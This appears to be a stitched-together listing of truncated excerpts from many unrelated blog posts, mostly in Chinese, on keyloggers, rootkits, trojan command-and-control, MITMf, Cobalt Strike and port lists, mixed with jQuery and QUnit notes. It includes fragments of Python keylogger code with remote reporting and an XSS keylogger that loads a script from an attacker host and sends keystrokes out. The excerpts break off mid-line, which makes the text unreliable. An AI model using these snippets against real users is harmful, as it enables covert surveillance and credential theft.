catalog . OpenCL . Linux DMA(Direct Memory Access) . GPU rootkit PoC by Team Jellyfish . GPU keylogger . DMA Hack 1. OpenCL OpenCL(Open Computing Language)是第一个面向异构系统通用目的并行编程的开放式.免费标准,也是一个统一的编程环境,便于软件开发人员为高性能计算服务器.桌面计算系统.手持设备编写高效轻便的代码,而且广泛适用于多核心处理器(CP…

@author: dlive 代码见github: https://github.com/Dliv3/Android-KeyLogger-Demo 前言 之前开发过一个Android的木马,其中KeyLogger使用辅助功能实现的,但是当时一直没有找到自动开启辅助功能的方法,看了freebuf上一篇文章之后觉得靠谱于是自己实践了一下 实现的功能 在已经root过的手机上实现了自动打开辅助功能,并使用辅助功能完成了一个KeyLogger Demo,KeyLogger记录的内容以Log的形式输出,l…

Object-Oriented Programming Keylogger Classes Way of modeling program(blueprint). Logically group functions and data. Makes code more readable. More reusable. Separate implementation from usage(encapsulation). Easier to extend. Easier to maintain. Th…

A program that records keys pressed on the keyboard. Common features: Store logs locally(local keyloggers). Report logs to an email or remote server(remote keyloggers). Log screenshots. Start with system startup. Third-Party Module: pynput pip instal…

下载keylogger:https://github.com/maxchehab/css-keylogging 参考讲解:https://blog.csdn.net/weixin_34138139/article/details/88018356(文字) https://www.bilibili.com/video/BV1J4411R7uH/?spm_id_from=333.788.videocard.1(视频) 知识补充:https://www.runoob.com/cssref/sel-at…

import pyHookimport sysimport pythoncomimport loggingfile_log = 'C:\\important\\log.txt'def OnKeyboardEvent(event):    logging.basicConfig(filename = file_log, level = logging.DEBUG, format = '%(message)s')    chr(event.Ascii)    logging.log(10, chr(…

Report function: Run in the background. Don't interrupt program execution. Every X seconds, send the report. ->Great case for threading. #!/usr/bin/env python import threading import pynput.keyboard log = "" def process_key_press(key): global…

声明:本文具有一定攻击性,仅作为技术交流和安全教学之用,不要用在除了搭建环境之外的环境. 0×01 题记 又是一年十月一,想到小伙伴们都纷纷出门旅游,皆有美酒佳人相伴,想到这里,不禁潸然泪下.子曰:"长得丑就要多读书!"于是有了这篇文章. 0×02 简要介绍 这篇文章的主要目的是介绍一下一个最新的中间人攻击测试框架 – MITMf.工具的作者是byt3bl33d3r,是基于代理工具sergio-proxy修改而来.这里是工具的地址: https://github.com/byt3bl3…

@author: dlive @date: 2016/12/19 0x01 SetWindowsHookEx() HHOOK SetWindowsHookEx( int idHook, //hook type HOOKPROC lpfn, //hook procedure(回调函数) HINSTANCE hMod, //hook procedure所属的DLL句柄 DWORD dwThreadId //想要挂钩的线程ID ); 使用SetWindowsHookEx() API可以轻松实现消息钩子…

catalogue . 引言 . Device Class Definition for Human Interface Devices (HID) . USB HID Report Descriptors . arduino USB Keyboard definition . USB Host Shield for Arduino分类 . USB Host Shield for Arduino datasheet . USB Host Library Rev.2.0 . USB Keyboar…

     入侵电脑,窃听用户,假身份上网——美国安全公司HBGary是电脑防护和间谍软件的供应商.而其客户中就有美国的国家安全机构.现在,该公司被偷的电子邮件可以让我们对其数字化战争中的业务做一个初步了解. 去年六月,美国安全公司HBGary的一名经理在美国联邦政府招标平台FBO.gov上发现了一个激动人心的项目:美国空军正在为一个所谓的“人事管理软件”寻找供应商.这一软件要能够让每个用户可以使用十个伪装身份上网.招标方对伪装身份的要求是:“必须可以让这些身份可以成为世界上任何地区的人.”而且即…

catalogue . 传统木马上线方式 . 新型木马上线方式 . QQ昵称上线 . QQ空间资料上线 . 第三方域名上线 . UDP/TCP二阶段混合上线 . Gmail CNC . NetBot两次TCP握手验证上线 . IRC Bot . WEBSHELL Bot . twittor Bot . Blaze Telegram Backdoor Toolkit (bt2) . 微信服务号Bot . smartqq-bot . P2P Bot 1. 传统木马上线方式 0x1: 正向主动连接 最…

Linux端口总结如下: 0|无效端口,通常用于分析操作系统 1|传输控制协议端口服务多路开关选择器 2|管理实用程序 3|压缩进程 5|远程作业登录 7|回显 9|丢弃 11|在线用户 13|时间 17|每日引用 18|消息发送协议 19|字符发生器 20|FTP文件传输协议(默认数据口) 21|FTP文件传输协议(控制) 22|SSH远程登录协议 23|telnet(终端仿真协议),木马Tiny Telnet Server开放此端口 24|预留给个人用邮件系统 25|SMTP服务器所开放的端…

导读 Linux用户又有一个木马需要苦恼了,就像以往一样,这些黑客大多部署在被劫持的Linux系统上,并在接受到命令后发起DDoS攻击. 发现这件事的Dr.Web的安全研究人员说:“木马似乎是通过破壳漏洞感染的这些Linux机器——现在仍然有很多设备没有补上这个漏洞.”该木马被命名为Linux.DDoS.93,它首要会修改/var/run/dhcpclient-eth0.pid这个文件,并通过它在计算机启动时运行.如果该文件不存在,就会自己创建一个. 当该木马运行起来以后会进行初始化,它会启动两…

转载来自: http://drops.wooyun.org/papers/4751?utm_source=tuicool 使用Python编写一个具有键盘记录.截屏以及通信功能的简易木马. 首先准备好我们需要的依赖库,python hook和pythoncom. 说起Keylogger,大家的思维可能早已飞向带有wifi功能的mini小硬件去了.抛开高科技,我们暂且回归本质,探探简易键盘记录器的原理与实现. Python keylogger键盘记录的功能的实现主要利用了pythoncom及pyt…

作为系统管理员,有些时候是需要记录系统中的其他用户的一些操作行为的,例如:当系统管理员怀疑系统存在漏洞,且已经有被植入后门或者创建隐藏账户时,就需要对曾经登陆的用户进行监控,保存其打开或者操作过的文件.或者在另外一个场景,当黑客拿下一个普通权限的shell之后,想看看最近有哪些用户登陆过,操作过什么,以便根据用户习惯采取进一步行动获取更高权限,这个时候记录用户行为就显得很重要了. 可能有读者觉得此时安装个监控软件不就行了么,拜托,你入侵别人的系统,你装个监控软件,你把管理员试做无物么?这个时候P…

模拟操作: elem.trigger(event); elem.triggerHandler(event); triggerHandler的不同: 不会引起事件的默认行为 .trigger() 会操作 jQuery 对象匹配的所有元素,而 .triggerHandler() 只影响第一个匹配元素. 由 .triggerHandler() 创建的事件不会在 DOM 树中冒泡. 该方法的返回的是事件处理函数的返回值,而不是 jQuery 对象. $.Event(event); 如果事件需要依赖特定的…

Name                                             Disclosure Date  Rank    Description ----                                             ---------------  ----    -----------    aix/hashdump                                                      normal  A…

http://blog.csdn.net/wswifth/article/details/5115475 注册一个hook函数是围绕nf_hook_ops数据结构的一个非常简单的操作,nf_hook_ops数据结构在linux/netfilter.h中定义,该数据结构的定义如下: struct nf_hook_ops {                  struct list_head list; /* 此下的值由用户填充 */                  nf_hookfn *hook…

dos命令netstat比较好用,能比较全的看到自己开放的端口及状态一般我用netstat -a端口:0服务:Reserved说明:通常用于分析操作系统.这一方法能够工作是因为在一些系统中“0”是无效端口,当你试图使用通常的闭合端口连接它时将产生不同的结果.一种典型的扫描,使用IP地址为0.0.0.0,设置ACK位并在以太网层广播. 端口:1服务:tcpmux说明:这显示有人在寻找SGI Irix机器.Irix是实现tcpmux的主要提供者,默认情况下tcpmux在这种系统中被打开.Irix机器…

XSS 原则上:只要XSS漏洞存在,可以编写任何功能的js脚本 [反射型漏洞利用] 键盘记录器:被记录下的数据会发送到攻击者指定的URL地址上 服务器:kali 客户端 启动apache2服务:service apache2 start 语法:<script src="http://192.168.1.127/keylogger.js"></script> keylogger.js document.onkeypress = function(evt) { ev…

TCP端口 7 = 回显 9 = 丢弃 11 = 在线用户 13 = 时间服务 15 = 网络状态 17 = 每日引用 18 = 消息发送 19 = 字符发生器 20 = ftp数据 21 = 文件传输 22 = SSH端口 23 = 远程终端 25 = 发送邮件 31 = Masters Paradise木马 37 = 时间 39 = 资源定位协议 41 = DeepThroat木马 42 = WINS 主机名服务 43 = WhoIs服务 58 = DMSetup木马 59 = 个人文件服务…

在网络技术,port(Port)通常,有两种含义:首先,物理意义port,例,ADSL Modem.枢纽.开关.路由器连接其他网络设备的接口,如RJ-45port.SCport等等.第二个是逻辑意义port,通常它指的是TCP/IP协议 port,port从数字范围0至65535,比方用于浏览网页服务. 查看port 在windows 2000/XP/Server 2003中要查看port.能够使用Netstat命令: 依次点击“開始→执行”.键入“cmd”并回车.打开命令提示符窗体. 在命令提…

在网络技术中,port(Port)大致有两种意思:一是物理意义上的port,比方,ADSL Modem.集线器.交换机.路由器用于连接其它网络设备的接口,如RJ-45port.SCport等等.二是逻辑意义上的port,通常是指TCP/IP协议中的 port,port号的范围从0到65535,比方用于浏览网页服务. 查看port 在windows 2000/XP/Server 2003中要查看port,能够使用Netstat命令: 依次点击“開始→执行”,键入“cmd”并回车,打开命令提示符窗体…

一. 安装 项目地址:https://github.com/byt3bl33d3r/MITMf 需要自行手动安装python-nfqueue,pefile模块 sudo apt-get install python-nfqueue,pefile sudo apt-get install mitmf* pip uninstall twisted wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2 pi…

一.服务器搭建与连接(1)团队服务器上: sudo ./teamserver 服务器IP 连接密码 (VPS的话要写外网ip,并且可以进行端口映射,默认使用50050端口) 但是这个一关闭团队服务器也就关闭了,这里我们可以把他置于后台来运行: nohup ./teamserver IP 用户名 & 这样就可以了,这个目录下会生成一个nohup.out的文件内存使用超过%50 无法启动java虚拟机.在结束Cobalt Strike的时候也要同时结束所有 msfrpcd 进程,不要下次启动会启动不…

HUC = = D组 http://www.cnhonkerarmy.com/ 63707869 =====================================开始============================================                (ps:本套教程为D组成员原创,如需装载请标明HUC-D组原创教程,谢谢合作) 理由:为了增进HUC-D组全体学员对系统的攻防技术. 介绍:攻防无绝对,了解系统的安全技术就等于让你在人生的道路上多了一把剑…

http://api.qunitjs.com/category/assert/    测试方法   选中 "Check for Globals" 会暴露全局对象,看你的代码会不会无意中输出到全局对象属性去了   选中 No try-catch 的话,出现错误testrunner就会挂掉,让你看到原生的错误提示,帮助在老浏览器调试  ie6啦   本质上任何一个单元测试的元素都是进行认定,测试框架将测试者定义的期望结构和实际结果进行比对,Qunit提供了八个方法来认定.   assert…

为什么需要单元测试 正确性:测试可以验证代码的正确性,在上线前做到心里有底 自动化:当然手工也可以测试,通过console可以打印出内部信息,但是这是一次性的事情,下次测试还需要从头来过,效率不能得到保证.通过编写测试用例,可以做到一次编写,多次运行 解释性:测试用例用于测试接口.模块的重要性,那么在测试用例中就会涉及如何使用这些API.其他开发人员如果要使用这些API,那阅读测试用例是一种很好地途径,有时比文档说明更清晰 驱动开发,指导设计:代码被测试的前提是代码本身的可测试性,那么要保证代码…

防火墙启用,增加禁用端口提供给外部访问 @echo off color E2 title 关闭常见的危险端口 echo 正在开启Windows防火墙 echo. netsh advfirewall set currentprofile state on > nul netsh advfirewall set publicprofile state on > nul netsh advfirewall set allprofile state on > nul netsh advfirew…